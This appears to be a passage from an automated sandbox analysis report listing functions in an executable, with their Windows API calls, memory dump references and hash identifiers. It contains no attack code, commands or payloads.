                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                            • String ID: msctls_trackbar32
                                                                                                                                                                                                                                                            • API String ID: 3850602802-1010561917
                                                                                                                                                                                                                                                            • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                                                                                                                                                                                            • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                                                                                                                                                                                                                            Function 00435215 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                            • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                                                                                                                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                                                                                                                                                                                                                            • String ID: crts
                                                                                                                                                                                                                                                            • API String ID: 943502515-3724388283
                                                                                                                                                                                                                                                            • Opcode ID: 48bed912f23612092a912c5be4ce8918b0696bdd3f38560407ee328223f716d6
                                                                                                                                                                                                                                                            • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 48bed912f23612092a912c5be4ce8918b0696bdd3f38560407ee328223f716d6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                                                                                                                                                                                                                            Function 0045D2C7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                                                                                                                                                                                                                            • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorMode$LabelVolume
                                                                                                                                                                                                                                                            • String ID: \VH
                                                                                                                                                                                                                                                            • API String ID: 2006950084-234962358
                                                                                                                                                                                                                                                            • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                                                                                                                                                                                            • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                                                                                                                                                                                                                            Function 004496E9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32 ref: 00449727
                                                                                                                                                                                                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                                                                                                                                                                                                                            • DrawMenuBar.USER32 ref: 00449761
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Menu$InfoItem$Draw_malloc
                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                            • API String ID: 772068139-4108050209
                                                                                                                                                                                                                                                            • Opcode ID: a8bf8344613a324865605a3c3a1dbedbe99a89b99ed919a4fa48337e9f4707c4
                                                                                                                                                                                                                                                            • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a8bf8344613a324865605a3c3a1dbedbe99a89b99ed919a4fa48337e9f4707c4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                                                                                                                                                                                                                            Function 00472A2B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _wcslen$_wcscpy
                                                                                                                                                                                                                                                            • String ID: 3, 3, 8, 1
                                                                                                                                                                                                                                                            • API String ID: 3469035223-357260408
                                                                                                                                                                                                                                                            • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                                                                                                                                                                                                            • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                                                                                                                                                                                                                            Function 004312CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                            • String ID: ICMP.DLL$IcmpCloseHandle
                                                                                                                                                                                                                                                            • API String ID: 2574300362-3530519716
                                                                                                                                                                                                                                                            • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                                                                                                                                                                                                            • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                                                                                                                                                                                                                            Function 004312FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                            • String ID: ICMP.DLL$IcmpCreateFile
                                                                                                                                                                                                                                                            • API String ID: 2574300362-275556492
                                                                                                                                                                                                                                                            • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                                                                                                                                                                                            • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                                                                                                                                                                                                                            Function 0043129A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                            • String ID: ICMP.DLL$IcmpSendEcho
                                                                                                                                                                                                                                                            • API String ID: 2574300362-58917771
                                                                                                                                                                                                                                                            • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                                                                                                                                                                                            • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                                                                                                                                                                                                                            Function 00430C7F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                            • API String ID: 2574300362-4033151799
                                                                                                                                                                                                                                                            • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                                                                                                                                                                                            • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                                                                                                                                                                                                                            Function 00479500 Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 0047950F
                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                                                                                                                                                                                                                            • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00479650
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Variant$AllocClearCopyInitString
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2808897238-0
                                                                                                                                                                                                                                                            • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                                                                                                                                                                                            • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                                                                                                                                                                                                                            Function 0046993E Relevance: 6.1, APIs: 4, Instructions: 149windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                                                                                                                                                                                                                            • __itow.LIBCMT ref: 004699CD
                                                                                                                                                                                                                                                              • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                                                                                                                                                                                                                            • __itow.LIBCMT ref: 00469A97
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessageSend$__itow
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3379773720-0
